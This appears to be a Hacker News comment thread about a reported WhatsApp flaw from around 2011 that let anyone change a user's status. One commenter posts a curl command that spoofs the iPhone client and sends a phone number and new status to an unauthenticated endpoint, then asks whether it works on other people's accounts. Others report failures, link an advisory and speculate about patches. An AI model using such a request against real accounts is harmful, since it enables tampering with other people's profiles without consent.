The site says the hole has been patched but I was just able to change my own status with this:<p><pre><code> curl -A "WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/iPhone_4" --header "Accept-Language: en-us" --header "Accept-Encoding: gzip, deflate" --header "Connection: keep-alive" -d "cc=1&me=%2B1{10_DIGIT_NUMBER}&s={URL_ENCODED_STATUS}" https://s.whatsapp.net/client/iphone/u.php
</code></pre>
It did take some time to show up under my name, even after restarting the app.
Did anybody have any success with changing someone else's status with this? If so, please post.<p>I got the success message on site and restarted the app too on iPhone by killing it from the multitasking bar but my friend's status is still unchanged.<p>Makes me doubt it is a fraud site as BuddhaSource mentioned.
Some more information about this can be found here: <a href="http://packetstormsecurity.org/files/108010/SA-20111219-1.txt" rel="nofollow">http://packetstormsecurity.org/files/108010/SA-20111219-1.tx...</a>
There's a few ways that they can patch this. I'm assuming that there's some sort of auth process in place for their http calls and this could simply be a case where this particular endpoint missed the auth.<p>Or they're simply blocking the whatsappstatus's ip and a fix would actually require both client side and server side changes.<p>But honestly its just a messaging app and how many people really cares if "let's go grab a beer" is encrypted or not.